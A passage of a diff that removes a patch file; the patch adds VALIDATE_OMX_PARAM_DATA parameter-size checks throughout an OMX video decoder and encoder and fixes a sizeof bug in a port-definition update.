- OMX_CONFIG_RECTTYPE *rect = (OMX_CONFIG_RECTTYPE *) configData;
- memcpy(rect, &rectangle, sizeof(OMX_CONFIG_RECTTYPE));
- DEBUG_PRINT_HIGH("get_config: crop info: L: %u, T: %u, R: %u, B: %u",
-@@ -4166,6 +4207,7 @@
- break;
- }
- case OMX_QcomIndexConfigPerfLevel: {
-+ VALIDATE_OMX_PARAM_DATA(configData, OMX_QCOM_VIDEO_CONFIG_PERF_LEVEL);
- struct v4l2_control control;
- OMX_QCOM_VIDEO_CONFIG_PERF_LEVEL *perf =
- (OMX_QCOM_VIDEO_CONFIG_PERF_LEVEL *)configData;
-@@ -4191,7 +4233,7 @@
- }
-
- break;
-- }
-+ }
- default: {
- DEBUG_PRINT_ERROR("get_config: unknown param %d",configIndex);
- eRet = OMX_ErrorBadParameter;
-@@ -4337,6 +4379,7 @@
- struct v4l2_control temp;
- temp.id = V4L2_CID_MPEG_VIDC_VIDEO_STREAM_FORMAT;
-
-+ VALIDATE_OMX_PARAM_DATA(configData, OMX_VIDEO_CONFIG_NALSIZE);
- pNal = reinterpret_cast < OMX_VIDEO_CONFIG_NALSIZE * >(configData);
- switch (pNal->nNaluBytes) {
- case 0:
-@@ -8752,7 +8795,7 @@
- }
- DEBUG_PRINT_LOW("omx_vdec::update_portdef");
- portDefn->nVersion.nVersion = OMX_SPEC_VERSION;
-- portDefn->nSize = sizeof(portDefn);
-+ portDefn->nSize = sizeof(OMX_PARAM_PORTDEFINITIONTYPE);
- portDefn->eDomain = OMX_PortDomainVideo;
- if (drv_ctx.frame_rate.fps_denominator > 0)
- portDefn->format.video.xFramerate = (drv_ctx.frame_rate.fps_numerator /
-diff --git a/mm-video-v4l2/vidc/venc/src/omx_video_base.cpp b/mm-video-v4l2/vidc/venc/src/omx_video_base.cpp
-index 7f0482f..1aee2c1 100644
---- a/mm-video-v4l2/vidc/venc/src/omx_video_base.cpp
-+++ b/mm-video-v4l2/vidc/venc/src/omx_video_base.cpp
-@@ -84,6 +84,8 @@
-
- typedef struct OMXComponentCapabilityFlagsType {
- ////////////////// OMX COMPONENT CAPABILITY RELATED MEMBERS
-+ OMX_U32 nSize;
-+ OMX_VERSIONTYPE nVersion;
- OMX_BOOL iIsOMXComponentMultiThreaded;
- OMX_BOOL iOMXComponentSupportsExternalOutputBufferAlloc;
- OMX_BOOL iOMXComponentSupportsExternalInputBufferAlloc;
-@@ -1443,6 +1445,7 @@
- switch ((int)paramIndex) {
- case OMX_IndexParamPortDefinition:
- {
-+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_PARAM_PORTDEFINITIONTYPE);
- OMX_PARAM_PORTDEFINITIONTYPE *portDefn;
- portDefn = (OMX_PARAM_PORTDEFINITIONTYPE *) paramData;
-
-@@ -1484,6 +1487,7 @@
- }
- case OMX_IndexParamVideoInit:
- {
-+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_PORT_PARAM_TYPE);
- OMX_PORT_PARAM_TYPE *portParamType =
- (OMX_PORT_PARAM_TYPE *) paramData;
- DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamVideoInit");
-@@ -1493,6 +1497,7 @@
- }
- case OMX_IndexParamVideoPortFormat:
- {
-+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_PORTFORMATTYPE);
- OMX_VIDEO_PARAM_PORTFORMATTYPE *portFmt =
- (OMX_VIDEO_PARAM_PORTFORMATTYPE *)paramData;
- DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamVideoPortFormat");
-@@ -1527,6 +1532,7 @@
- }
- case OMX_IndexParamVideoBitrate:
- {
-+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_BITRATETYPE);
- OMX_VIDEO_PARAM_BITRATETYPE* pParam = (OMX_VIDEO_PARAM_BITRATETYPE*)paramData;
- DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamVideoBitrate");
-
-@@ -1541,6 +1547,7 @@
- }
- case OMX_IndexParamVideoMpeg4:
- {
-+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_MPEG4TYPE);
- OMX_VIDEO_PARAM_MPEG4TYPE* pParam = (OMX_VIDEO_PARAM_MPEG4TYPE*)paramData;
- DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamVideoMpeg4");
- memcpy(pParam, &m_sParamMPEG4, sizeof(m_sParamMPEG4));
-@@ -1548,6 +1555,7 @@
- }
- case OMX_IndexParamVideoH263:
- {
-+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_H263TYPE);
- OMX_VIDEO_PARAM_H263TYPE* pParam = (OMX_VIDEO_PARAM_H263TYPE*)paramData;
- DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamVideoH263");
- memcpy(pParam, &m_sParamH263, sizeof(m_sParamH263));
-@@ -1555,6 +1563,7 @@
- }
- case OMX_IndexParamVideoAvc:
- {
-+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_AVCTYPE);
- OMX_VIDEO_PARAM_AVCTYPE* pParam = (OMX_VIDEO_PARAM_AVCTYPE*)paramData;
- DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamVideoAvc");
- memcpy(pParam, &m_sParamAVC, sizeof(m_sParamAVC));
-@@ -1562,6 +1571,7 @@
- }
- case (OMX_INDEXTYPE)OMX_IndexParamVideoVp8:
- {
-+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_VP8TYPE);
- OMX_VIDEO_PARAM_VP8TYPE* pParam = (OMX_VIDEO_PARAM_VP8TYPE*)paramData;
- DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamVideoVp8");
- memcpy(pParam, &m_sParamVP8, sizeof(m_sParamVP8));
-@@ -1569,6 +1579,7 @@
- }
- case (OMX_INDEXTYPE)OMX_IndexParamVideoHevc:
- {
-+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_HEVCTYPE);
- OMX_VIDEO_PARAM_HEVCTYPE* pParam = (OMX_VIDEO_PARAM_HEVCTYPE*)paramData;
- DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamVideoHevc");
- memcpy(pParam, &m_sParamHEVC, sizeof(m_sParamHEVC));
-@@ -1576,6 +1587,7 @@
- }
- case OMX_IndexParamVideoProfileLevelQuerySupported:
- {
-+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_PROFILELEVELTYPE);
- OMX_VIDEO_PARAM_PROFILELEVELTYPE* pParam = (OMX_VIDEO_PARAM_PROFILELEVELTYPE*)paramData;
- DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamVideoProfileLevelQuerySupported");
- eRet = get_supported_profile_level(pParam);
-@@ -1586,6 +1598,7 @@
- }
- case OMX_IndexParamVideoProfileLevelCurrent:
- {
-+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_PROFILELEVELTYPE);
- OMX_VIDEO_PARAM_PROFILELEVELTYPE* pParam = (OMX_VIDEO_PARAM_PROFILELEVELTYPE*)paramData;
- DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamVideoProfileLevelCurrent");
- memcpy(pParam, &m_sParamProfileLevel, sizeof(m_sParamProfileLevel));
-@@ -1594,6 +1607,7 @@
- /*Component should support this port definition*/
- case OMX_IndexParamAudioInit:
- {
-+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_PORT_PARAM_TYPE);
- OMX_PORT_PARAM_TYPE *audioPortParamType = (OMX_PORT_PARAM_TYPE *) paramData;
- DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamAudioInit");
- memcpy(audioPortParamType, &m_sPortParam_audio, sizeof(m_sPortParam_audio));
-@@ -1602,6 +1616,7 @@
- /*Component should support this port definition*/
- case OMX_IndexParamImageInit:
- {
-+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_PORT_PARAM_TYPE);
- OMX_PORT_PARAM_TYPE *imagePortParamType = (OMX_PORT_PARAM_TYPE *) paramData;
- DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamImageInit");
- memcpy(imagePortParamType, &m_sPortParam_img, sizeof(m_sPortParam_img));
-@@ -1617,6 +1632,7 @@
- }
- case OMX_IndexParamStandardComponentRole:
- {
-+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_PARAM_COMPONENTROLETYPE);
- OMX_PARAM_COMPONENTROLETYPE *comp_role;
- comp_role = (OMX_PARAM_COMPONENTROLETYPE *) paramData;
- comp_role->nVersion.nVersion = OMX_SPEC_VERSION;
-@@ -1629,7 +1645,7 @@ - /* Added for parameter test */ - case OMX_IndexParamPriorityMgmt: - { -- -+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_PRIORITYMGMTTYPE); - OMX_PRIORITYMGMTTYPE *priorityMgmType = (OMX_PRIORITYMGMTTYPE *) paramData; - DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamPriorityMgmt"); - memcpy(priorityMgmType, &m_sPriorityMgmt, sizeof(m_sPriorityMgmt)); -@@ -1638,6 +1654,7 @@ - /* Added for parameter test */ - case OMX_IndexParamCompBufferSupplier: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_PARAM_BUFFERSUPPLIERTYPE); - OMX_PARAM_BUFFERSUPPLIERTYPE *bufferSupplierType = (OMX_PARAM_BUFFERSUPPLIERTYPE*) paramData; - DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamCompBufferSupplier"); - if (bufferSupplierType->nPortIndex ==(OMX_U32) PORT_INDEX_IN) { -@@ -1653,6 +1670,7 @@ - - case OMX_IndexParamVideoQuantization: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_QUANTIZATIONTYPE); - OMX_VIDEO_PARAM_QUANTIZATIONTYPE *session_qp = (OMX_VIDEO_PARAM_QUANTIZATIONTYPE*) paramData; - DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamVideoQuantization"); - memcpy(session_qp, &m_sSessionQuantization, sizeof(m_sSessionQuantization)); -@@ -1661,6 +1679,7 @@ - - case OMX_QcomIndexParamVideoQPRange: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_QCOM_VIDEO_PARAM_QPRANGETYPE); - OMX_QCOM_VIDEO_PARAM_QPRANGETYPE *qp_range = (OMX_QCOM_VIDEO_PARAM_QPRANGETYPE*) paramData; - DEBUG_PRINT_LOW("get_parameter: OMX_QcomIndexParamVideoQPRange"); - memcpy(qp_range, &m_sSessionQPRange, sizeof(m_sSessionQPRange)); -@@ -1669,6 +1688,7 @@ - - case OMX_IndexParamVideoErrorCorrection: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_ERRORCORRECTIONTYPE); - OMX_VIDEO_PARAM_ERRORCORRECTIONTYPE* errorresilience = (OMX_VIDEO_PARAM_ERRORCORRECTIONTYPE*)paramData; - DEBUG_PRINT_LOW("OMX_IndexParamVideoErrorCorrection"); - errorresilience->bEnableHEC = m_sErrorCorrection.bEnableHEC; -@@ -1678,6 +1698,7 @@ - } - case OMX_IndexParamVideoIntraRefresh: - { -+ 
VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_INTRAREFRESHTYPE); - OMX_VIDEO_PARAM_INTRAREFRESHTYPE* intrarefresh = (OMX_VIDEO_PARAM_INTRAREFRESHTYPE*)paramData; - DEBUG_PRINT_LOW("OMX_IndexParamVideoIntraRefresh"); - DEBUG_PRINT_ERROR("OMX_IndexParamVideoIntraRefresh GET"); -@@ -1690,6 +1711,7 @@ - break; - case OMX_COMPONENT_CAPABILITY_TYPE_INDEX: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, OMXComponentCapabilityFlagsType); - OMXComponentCapabilityFlagsType *pParam = reinterpret_cast(paramData); - DEBUG_PRINT_LOW("get_parameter: OMX_COMPONENT_CAPABILITY_TYPE_INDEX"); - pParam->iIsOMXComponentMultiThreaded = OMX_TRUE; -@@ -1707,6 +1729,7 @@ - #if !defined(MAX_RES_720P) || defined(_MSM8974_) - case OMX_QcomIndexParamIndexExtraDataType: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, QOMX_INDEXEXTRADATATYPE); - DEBUG_PRINT_LOW("get_parameter: OMX_QcomIndexParamIndexExtraDataType"); - QOMX_INDEXEXTRADATATYPE *pParam = (QOMX_INDEXEXTRADATATYPE *)paramData; - if (pParam->nIndex == (OMX_INDEXTYPE)OMX_ExtraDataVideoEncoderSliceInfo) { -@@ -1752,6 +1775,7 @@ - } - case QOMX_IndexParamVideoLTRCountRangeSupported: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, QOMX_EXTNINDEX_RANGETYPE); - DEBUG_PRINT_HIGH("get_parameter: QOMX_IndexParamVideoLTRCountRangeSupported"); - QOMX_EXTNINDEX_RANGETYPE *pParam = (QOMX_EXTNINDEX_RANGETYPE *)paramData; - if (pParam->nPortIndex == PORT_INDEX_OUT) { -@@ -1772,6 +1796,7 @@ - break; - case OMX_QcomIndexParamVideoLTRCount: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_QCOM_VIDEO_PARAM_LTRCOUNT_TYPE); - DEBUG_PRINT_LOW("get_parameter: OMX_QcomIndexParamVideoLTRCount"); - OMX_QCOM_VIDEO_PARAM_LTRCOUNT_TYPE *pParam = - reinterpret_cast(paramData); -@@ -1781,6 +1806,7 @@ - #endif - case QOMX_IndexParamVideoSyntaxHdr: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, QOMX_EXTNINDEX_PARAMTYPE); - DEBUG_PRINT_HIGH("QOMX_IndexParamVideoSyntaxHdr"); - QOMX_EXTNINDEX_PARAMTYPE* pParam = - reinterpret_cast(paramData); -@@ -1826,6 +1852,7 @@ - } - case 
OMX_QcomIndexHierarchicalStructure: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, QOMX_VIDEO_HIERARCHICALLAYERS); - QOMX_VIDEO_HIERARCHICALLAYERS* hierp = (QOMX_VIDEO_HIERARCHICALLAYERS*) paramData; - DEBUG_PRINT_LOW("get_parameter: OMX_QcomIndexHierarchicalStructure"); - memcpy(hierp, &m_sHierLayers, sizeof(m_sHierLayers)); -@@ -1833,6 +1860,7 @@ - } - case OMX_QcomIndexParamPerfLevel: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_QCOM_VIDEO_PARAM_PERF_LEVEL); - OMX_U32 perflevel; - OMX_QCOM_VIDEO_PARAM_PERF_LEVEL *pParam = - reinterpret_cast(paramData); -@@ -1847,6 +1875,7 @@ - } - case OMX_QcomIndexParamH264VUITimingInfo: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_QCOM_VIDEO_PARAM_VUI_TIMING_INFO); - OMX_U32 enabled; - OMX_QCOM_VIDEO_PARAM_VUI_TIMING_INFO *pParam = - reinterpret_cast(paramData); -@@ -1861,6 +1890,7 @@ - } - case OMX_QcomIndexParamPeakBitrate: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_QCOM_VIDEO_PARAM_PEAK_BITRATE); - OMX_U32 peakbitrate; - OMX_QCOM_VIDEO_PARAM_PEAK_BITRATE *pParam = - reinterpret_cast(paramData); -@@ -1875,6 +1905,7 @@ - } - case QOMX_IndexParamVideoInitialQp: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, QOMX_EXTNINDEX_VIDEO_INITIALQP); - QOMX_EXTNINDEX_VIDEO_INITIALQP* initqp = - reinterpret_cast(paramData); - memcpy(initqp, &m_sParamInitqp, sizeof(m_sParamInitqp)); -@@ -1934,18 +1965,21 @@ - switch ((int)configIndex) { - case OMX_IndexConfigVideoBitrate: - { -+ VALIDATE_OMX_PARAM_DATA(configData, OMX_VIDEO_CONFIG_BITRATETYPE); - OMX_VIDEO_CONFIG_BITRATETYPE* pParam = reinterpret_cast(configData); - memcpy(pParam, &m_sConfigBitrate, sizeof(m_sConfigBitrate)); - break; - } - case OMX_IndexConfigVideoFramerate: - { -+ VALIDATE_OMX_PARAM_DATA(configData, OMX_CONFIG_FRAMERATETYPE); - OMX_CONFIG_FRAMERATETYPE* pParam = reinterpret_cast(configData); - memcpy(pParam, &m_sConfigFramerate, sizeof(m_sConfigFramerate)); - break; - } - case OMX_IndexConfigCommonRotate: - { -+ VALIDATE_OMX_PARAM_DATA(configData, OMX_CONFIG_ROTATIONTYPE); - 
OMX_CONFIG_ROTATIONTYPE* pParam = reinterpret_cast(configData); - memcpy(pParam, &m_sConfigFrameRotation, sizeof(m_sConfigFrameRotation)); - break; -@@ -1953,12 +1987,14 @@ - case QOMX_IndexConfigVideoIntraperiod: - { - DEBUG_PRINT_LOW("get_config:QOMX_IndexConfigVideoIntraperiod"); -+ VALIDATE_OMX_PARAM_DATA(configData, QOMX_VIDEO_INTRAPERIODTYPE); - QOMX_VIDEO_INTRAPERIODTYPE* pParam = reinterpret_cast(configData); - memcpy(pParam, &m_sIntraperiod, sizeof(m_sIntraperiod)); - break; - } - case OMX_IndexConfigVideoAVCIntraPeriod: - { -+ VALIDATE_OMX_PARAM_DATA(configData, OMX_VIDEO_CONFIG_AVCINTRAPERIOD); - OMX_VIDEO_CONFIG_AVCINTRAPERIOD *pParam = - reinterpret_cast(configData); - DEBUG_PRINT_LOW("get_config: OMX_IndexConfigVideoAVCIntraPeriod"); -@@ -1967,6 +2003,7 @@ - } - case OMX_IndexConfigCommonDeinterlace: - { -+ VALIDATE_OMX_PARAM_DATA(configData, OMX_VIDEO_CONFIG_DEINTERLACE); - OMX_VIDEO_CONFIG_DEINTERLACE *pParam = - reinterpret_cast(configData); - DEBUG_PRINT_LOW("get_config: OMX_IndexConfigCommonDeinterlace"); -@@ -1975,6 +2012,7 @@ - } - case OMX_IndexConfigVideoVp8ReferenceFrame: - { -+ VALIDATE_OMX_PARAM_DATA(configData, OMX_VIDEO_VP8REFERENCEFRAMETYPE); - OMX_VIDEO_VP8REFERENCEFRAMETYPE* pParam = - reinterpret_cast(configData); - DEBUG_PRINT_LOW("get_config: OMX_IndexConfigVideoVp8ReferenceFrame"); -@@ -1983,6 +2021,7 @@ - } - case OMX_QcomIndexConfigPerfLevel: - { -+ VALIDATE_OMX_PARAM_DATA(configData, OMX_QCOM_VIDEO_CONFIG_PERF_LEVEL); - OMX_U32 perflevel; - OMX_QCOM_VIDEO_CONFIG_PERF_LEVEL *pParam = - reinterpret_cast(configData); -diff --git a/mm-video-v4l2/vidc/venc/src/omx_video_encoder.cpp b/mm-video-v4l2/vidc/venc/src/omx_video_encoder.cpp -index a72e07e..70d6260 100644 ---- a/mm-video-v4l2/vidc/venc/src/omx_video_encoder.cpp -+++ b/mm-video-v4l2/vidc/venc/src/omx_video_encoder.cpp -@@ -577,6 +577,7 @@ - switch ((int)paramIndex) { - case OMX_IndexParamPortDefinition: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_PARAM_PORTDEFINITIONTYPE); 
- OMX_PARAM_PORTDEFINITIONTYPE *portDefn; - portDefn = (OMX_PARAM_PORTDEFINITIONTYPE *) paramData; - DEBUG_PRINT_LOW("set_parameter: OMX_IndexParamPortDefinition H= %d, W = %d", -@@ -676,6 +677,7 @@ - - case OMX_IndexParamVideoPortFormat: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_PORTFORMATTYPE); - OMX_VIDEO_PARAM_PORTFORMATTYPE *portFmt = - (OMX_VIDEO_PARAM_PORTFORMATTYPE *)paramData; - DEBUG_PRINT_LOW("set_parameter: OMX_IndexParamVideoPortFormat %d", -@@ -719,6 +721,7 @@ - break; - case OMX_IndexParamVideoInit: - { //TODO, do we need this index set param -+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_PORT_PARAM_TYPE); - OMX_PORT_PARAM_TYPE* pParam = (OMX_PORT_PARAM_TYPE*)(paramData); - DEBUG_PRINT_LOW("Set OMX_IndexParamVideoInit called"); - break; -@@ -726,6 +729,7 @@ - - case OMX_IndexParamVideoBitrate: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_BITRATETYPE); - OMX_VIDEO_PARAM_BITRATETYPE* pParam = (OMX_VIDEO_PARAM_BITRATETYPE*)paramData; - DEBUG_PRINT_LOW("set_parameter: OMX_IndexParamVideoBitrate"); - if (handle->venc_set_param(paramData,OMX_IndexParamVideoBitrate) != true) { -@@ -742,6 +746,7 @@ - } - case OMX_IndexParamVideoMpeg4: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_MPEG4TYPE); - OMX_VIDEO_PARAM_MPEG4TYPE* pParam = (OMX_VIDEO_PARAM_MPEG4TYPE*)paramData; - OMX_VIDEO_PARAM_MPEG4TYPE mp4_param; - memcpy(&mp4_param, pParam, sizeof(struct OMX_VIDEO_PARAM_MPEG4TYPE)); -@@ -795,6 +800,7 @@ - } - case OMX_IndexParamVideoAvc: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_AVCTYPE); - OMX_VIDEO_PARAM_AVCTYPE* pParam = (OMX_VIDEO_PARAM_AVCTYPE*)paramData; - OMX_VIDEO_PARAM_AVCTYPE avc_param; - memcpy(&avc_param, pParam, sizeof( struct OMX_VIDEO_PARAM_AVCTYPE)); -@@ -854,6 +860,7 @@ - } - case (OMX_INDEXTYPE)OMX_IndexParamVideoVp8: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_VP8TYPE); - OMX_VIDEO_PARAM_VP8TYPE* pParam = (OMX_VIDEO_PARAM_VP8TYPE*)paramData; - OMX_VIDEO_PARAM_VP8TYPE vp8_param; - 
DEBUG_PRINT_LOW("set_parameter: OMX_IndexParamVideoVp8"); -@@ -870,6 +877,7 @@ - } - case (OMX_INDEXTYPE)OMX_IndexParamVideoHevc: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_HEVCTYPE); - OMX_VIDEO_PARAM_HEVCTYPE* pParam = (OMX_VIDEO_PARAM_HEVCTYPE*)paramData; - OMX_VIDEO_PARAM_HEVCTYPE hevc_param; - DEBUG_PRINT_LOW("set_parameter: OMX_IndexParamVideoHevc"); -@@ -883,6 +891,7 @@ - } - case OMX_IndexParamVideoProfileLevelCurrent: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_PROFILELEVELTYPE); - OMX_VIDEO_PARAM_PROFILELEVELTYPE* pParam = (OMX_VIDEO_PARAM_PROFILELEVELTYPE*)paramData; - DEBUG_PRINT_LOW("set_parameter: OMX_IndexParamVideoProfileLevelCurrent"); - if (handle->venc_set_param(pParam,OMX_IndexParamVideoProfileLevelCurrent) != true) { -@@ -937,6 +946,7 @@ - } - case OMX_IndexParamStandardComponentRole: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_PARAM_COMPONENTROLETYPE); - OMX_PARAM_COMPONENTROLETYPE *comp_role; - comp_role = (OMX_PARAM_COMPONENTROLETYPE *) paramData; - DEBUG_PRINT_LOW("set_parameter: OMX_IndexParamStandardComponentRole %s", -@@ -1007,6 +1017,7 @@ - - case OMX_IndexParamPriorityMgmt: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_PRIORITYMGMTTYPE); - DEBUG_PRINT_LOW("set_parameter: OMX_IndexParamPriorityMgmt"); - if (m_state != OMX_StateLoaded) { - DEBUG_PRINT_ERROR("ERROR: Set Parameter called in Invalid State"); -@@ -1027,6 +1038,7 @@ - - case OMX_IndexParamCompBufferSupplier: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_PARAM_BUFFERSUPPLIERTYPE); - DEBUG_PRINT_LOW("set_parameter: OMX_IndexParamCompBufferSupplier"); - OMX_PARAM_BUFFERSUPPLIERTYPE *bufferSupplierType = (OMX_PARAM_BUFFERSUPPLIERTYPE*) paramData; - DEBUG_PRINT_LOW("set_parameter: OMX_IndexParamCompBufferSupplier %d", -@@ -1043,6 +1055,7 @@ - } - case OMX_IndexParamVideoQuantization: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_QUANTIZATIONTYPE); - DEBUG_PRINT_LOW("set_parameter: OMX_IndexParamVideoQuantization"); - 
OMX_VIDEO_PARAM_QUANTIZATIONTYPE *session_qp = (OMX_VIDEO_PARAM_QUANTIZATIONTYPE*) paramData; - if (session_qp->nPortIndex == PORT_INDEX_OUT) { -@@ -1061,6 +1074,7 @@ - - case OMX_QcomIndexParamVideoQPRange: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_QCOM_VIDEO_PARAM_QPRANGETYPE); - DEBUG_PRINT_LOW("set_parameter: OMX_QcomIndexParamVideoQPRange"); - OMX_QCOM_VIDEO_PARAM_QPRANGETYPE *qp_range = (OMX_QCOM_VIDEO_PARAM_QPRANGETYPE*) paramData; - if (qp_range->nPortIndex == PORT_INDEX_OUT) { -@@ -1079,6 +1093,7 @@ - - case OMX_QcomIndexPortDefn: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_QCOM_PARAM_PORTDEFINITIONTYPE); - OMX_QCOM_PARAM_PORTDEFINITIONTYPE* pParam = - (OMX_QCOM_PARAM_PORTDEFINITIONTYPE*)paramData; - DEBUG_PRINT_LOW("set_parameter: OMX_QcomIndexPortDefn"); -@@ -1105,6 +1120,7 @@ - - case OMX_IndexParamVideoErrorCorrection: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_ERRORCORRECTIONTYPE); - DEBUG_PRINT_LOW("OMX_IndexParamVideoErrorCorrection"); - OMX_VIDEO_PARAM_ERRORCORRECTIONTYPE* pParam = - (OMX_VIDEO_PARAM_ERRORCORRECTIONTYPE*)paramData; -@@ -1117,6 +1133,7 @@ - } - case OMX_IndexParamVideoIntraRefresh: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_INTRAREFRESHTYPE); - DEBUG_PRINT_LOW("set_param:OMX_IndexParamVideoIntraRefresh"); - OMX_VIDEO_PARAM_INTRAREFRESHTYPE* pParam = - (OMX_VIDEO_PARAM_INTRAREFRESHTYPE*)paramData; -@@ -1130,6 +1147,7 @@ - #ifdef _ANDROID_ICS_ - case OMX_QcomIndexParamVideoMetaBufferMode: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, StoreMetaDataInBuffersParams); - StoreMetaDataInBuffersParams *pParam = - (StoreMetaDataInBuffersParams*)paramData; - DEBUG_PRINT_HIGH("set_parameter:OMX_QcomIndexParamVideoMetaBufferMode: " -@@ -1176,6 +1194,7 @@ - #if !defined(MAX_RES_720P) || defined(_MSM8974_) - case OMX_QcomIndexParamIndexExtraDataType: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, QOMX_INDEXEXTRADATATYPE); - DEBUG_PRINT_HIGH("set_parameter: OMX_QcomIndexParamIndexExtraDataType"); - QOMX_INDEXEXTRADATATYPE 
*pParam = (QOMX_INDEXEXTRADATATYPE *)paramData; - bool enable = false; -@@ -1256,6 +1275,7 @@ - } - case QOMX_IndexParamVideoLTRMode: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, QOMX_VIDEO_PARAM_LTRMODE_TYPE); - QOMX_VIDEO_PARAM_LTRMODE_TYPE* pParam = - (QOMX_VIDEO_PARAM_LTRMODE_TYPE*)paramData; - if (!handle->venc_set_param(paramData, (OMX_INDEXTYPE)QOMX_IndexParamVideoLTRMode)) { -@@ -1267,6 +1287,7 @@ - } - case QOMX_IndexParamVideoLTRCount: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, QOMX_VIDEO_PARAM_LTRCOUNT_TYPE); - QOMX_VIDEO_PARAM_LTRCOUNT_TYPE* pParam = - (QOMX_VIDEO_PARAM_LTRCOUNT_TYPE*)paramData; - if (!handle->venc_set_param(paramData, (OMX_INDEXTYPE)QOMX_IndexParamVideoLTRCount)) { -@@ -1279,6 +1300,7 @@ - #endif - case OMX_QcomIndexParamVideoMaxAllowedBitrateCheck: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, QOMX_EXTNINDEX_PARAMTYPE); - QOMX_EXTNINDEX_PARAMTYPE* pParam = - (QOMX_EXTNINDEX_PARAMTYPE*)paramData; - if (pParam->nPortIndex == PORT_INDEX_OUT) { -@@ -1296,6 +1318,7 @@ - #ifdef MAX_RES_1080P - case OMX_QcomIndexEnableSliceDeliveryMode: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, QOMX_EXTNINDEX_PARAMTYPE); - QOMX_EXTNINDEX_PARAMTYPE* pParam = - (QOMX_EXTNINDEX_PARAMTYPE*)paramData; - if (pParam->nPortIndex == PORT_INDEX_OUT) { -@@ -1314,6 +1337,7 @@ - #endif - case OMX_QcomIndexEnableH263PlusPType: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, QOMX_EXTNINDEX_PARAMTYPE); - QOMX_EXTNINDEX_PARAMTYPE* pParam = - (QOMX_EXTNINDEX_PARAMTYPE*)paramData; - DEBUG_PRINT_LOW("OMX_QcomIndexEnableH263PlusPType"); -@@ -1332,6 +1356,7 @@ - } - case OMX_QcomIndexParamSequenceHeaderWithIDR: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, PrependSPSPPSToIDRFramesParams); - if(!handle->venc_set_param(paramData, - (OMX_INDEXTYPE)OMX_QcomIndexParamSequenceHeaderWithIDR)) { - DEBUG_PRINT_ERROR("%s: %s", -@@ -1343,6 +1368,7 @@ - } - case OMX_QcomIndexParamH264AUDelimiter: - { -+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_QCOM_VIDEO_CONFIG_H264_AUD); - if(!handle->venc_set_param(paramData, 
